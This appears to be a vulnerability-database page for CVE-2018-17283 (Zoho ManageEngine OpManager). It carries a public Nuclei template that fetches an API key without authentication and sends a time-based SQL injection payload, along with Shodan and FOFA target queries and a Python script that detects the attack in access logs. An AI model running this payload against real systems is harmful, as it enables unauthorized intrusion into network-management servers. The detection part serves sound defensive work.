CVE-2018-17283: Zoho ManageEngine OpManager - SQL Injection

Date: 2025-08-01 | Affected software: Zoho ManageEngine OpManager | PoC: public

Vulnerability description

Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.

PoC code [public]

id: CVE-2018-17283

info:
  name: Zoho ManageEngine OpManager - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-17283
    cwe-id: CWE-89
    epss-score: 0.35826
    epss-percentile: 0.96974
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/x-f1v3/forcve/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17283
  metadata:
    verified: true
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"OpManager"
    fofa-query: title="OpManager"
  tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli

http:
  - raw:
      - |
        GET /oputilsServlet?action=getAPIKey HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: api_key
        regex:
          - 'API_KEY=([0-9a-z]+)'
        internal: true

  - raw:
      - |
        POST /api/json/device/setManaged?apiKey={{api_key}}&manage=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        name=KcP7OGhC';select%20pg_sleep(6);%20--

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains(body,"result")'
          - 'contains(content_type,"application/json")'
        condition: and
# digest: 490a0046304402201de231ae9b264de83df91e31dc22b05d425995d2f050d64005857f3df0188f5602206c9def69429a7b2c97aaf2fb51ec8479587d20259f6244f15a48f9b996fffc52:922c64590222798bb761d5b6d8e72950
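The template above has two stages that leave a trace in a web server's access log: an unauthenticated GET to /oputilsServlet?action=getAPIKey, followed by a POST to /api/json/device/setManaged whose response is delayed by the time-based payload. The following is an added detection example written for this page; it is not code from the original page or from the Nuclei project. It assumes a common-log-format access log with the request time appended as the last field (nginx $request_time style), a 5-second slowness threshold and a 10-minute correlation window; the sample log lines are constructed for the example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample access-log lines (common log format with request time in
# seconds appended as the last field). Not real traffic; made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 200 64 0.012
10.0.0.5 - - [01/Aug/2025:10:00:03 +0000] "POST /api/json/device/setManaged?apiKey=abc123&manage=false HTTP/1.1" 200 38 6.104
10.0.0.9 - - [01/Aug/2025:10:01:00 +0000] "GET /apiclient/ember/index.jsp HTTP/1.1" 200 5120 0.030
10.0.0.7 - - [01/Aug/2025:10:02:00 +0000] "POST /api/json/device/setManaged?apiKey=def456&manage=true HTTP/1.1" 200 38 7.250
"""

# Assumed log layout: ip ident user [timestamp] "METHOD path HTTP/x" status bytes request_time
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ (?P<rt>\d+(?:\.\d+)?)$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "method": m.group("method"),
        # Decode percent-encoding so an encoded query string is still recognised.
        "path": unquote(m.group("path")),
        "status": int(m.group("status")),
        "rt": float(m.group("rt")),
    }


def analyze(log_text, slow_seconds=5.0, window=timedelta(minutes=10)):
    """Flag the two stages of CVE-2018-17283 activity in an access log.

    - Any request to /oputilsServlet?action=getAPIKey (the servlet needs no
      authentication, so every hit is worth reviewing).
    - A setManaged call that took at least `slow_seconds`, which is what a
      time-based SQL injection probe looks like from the server side. Such a
      call is correlated with an API-key request from the same source IP
      inside `window` to raise its confidence.
    """
    key_requests = {}  # source ip -> timestamps of getAPIKey requests
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        lower = path.lower()
        if lower.startswith("/oputilsservlet") and "action=getapikey" in lower:
            key_requests.setdefault(rec["ip"], []).append(rec["ts"])
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": "api_key_request"})
        elif lower.startswith("/api/json/device/setmanaged") and rec["rt"] >= slow_seconds:
            prior = [t for t in key_requests.get(rec["ip"], [])
                     if timedelta(0) <= rec["ts"] - t <= window]
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "kind": "slow_setmanaged",
                "request_time": rec["rt"],
                "preceded_by_key_request": bool(prior),
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The slowness threshold is deliberately below the 6 seconds used by the template's pg_sleep payload so that a probe with a slightly shorter sleep is still caught; tune it against the normal latency of setManaged on the monitored host. Because the injected value travels in the POST body, an access log alone cannot show the payload, which is why the script keys on response time and on the preceding API-key request rather than on body content.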
